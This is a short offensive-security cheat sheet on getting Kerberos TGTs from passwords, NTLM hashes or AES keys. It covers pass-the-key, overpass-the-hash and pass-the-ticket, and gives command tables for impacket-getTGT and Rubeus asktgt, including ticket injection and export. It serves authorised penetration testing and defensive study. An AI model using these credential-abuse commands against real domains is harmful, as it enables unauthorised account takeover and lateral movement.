Password / Hash --> TGT¶
TGT retrieval methods¶
-
Normal Kerberos authentication
- Requires username and password
-
Pass-the-key
- Use any kerberos long-term key (RC4 or AES) to get a TGT without knowing the plaintext password.
- Overpass-the-Hash
- If RC4 is enabled then the target user's NTLM can be used directly to obtain a TGT
-
Pass-the-ticket
- Using a TGT which has already been obtained, regardless of how it was obtained.
Linux / impacket-getTGT¶
| Action | Command |
|---|---|
| Password to TGT | impacket-getTGT <domain>/<user>:'<password>' -dc-ip <dc_ip> |
| NTLM hash to TGT | impacket-getTGT -hashes <LMHASH:NTHASH> <domain>/<user> -dc-ip <dc_ip> |
| AES to TGT | impacket-getTGT -aesKey <AES_HEX> <domain>/<user> -dc-ip <dc_ip> |
Windows / Rubeus¶
| Action | Command |
|---|---|
| Password to TGT (inject) | Rubeus.exe asktgt /user:<user> /domain:<domain> /password:<password> /ptt |
| NTLM hash to TGT (RC4_HMAC) (inject) | Rubeus.exe asktgt /user:<user> /domain:<domain> /rc4:<NTHASH> /ptt |
| AES-256 to TGT (inject) | Rubeus.exe asktgt /user:<user> /domain:<domain> /aes256:<HEX> /ptt |
| AES-128 to TGT (inject) | Rubeus.exe asktgt /user:<user> /domain:<domain> /aes128:<HEX> /ptt |
| Machine account (password) | Rubeus.exe asktgt /user:<machine$> /domain:<domain> /password:<password> /ptt |
| Specify DC/KDC | Rubeus.exe asktgt /user:<user> /domain:<domain> /password:<password> /dc:<dc_ip_or_fqdn> /ptt |
| Save TGT to file | Rubeus.exe asktgt /user:<user> /domain:<domain> /password:<password> /outfile:C:\temp\<user>.tgt.kirbi |
| Base64 ticket to stdout | Rubeus.exe asktgt /user:<user> /domain:<domain> /password:<password> /nowrap |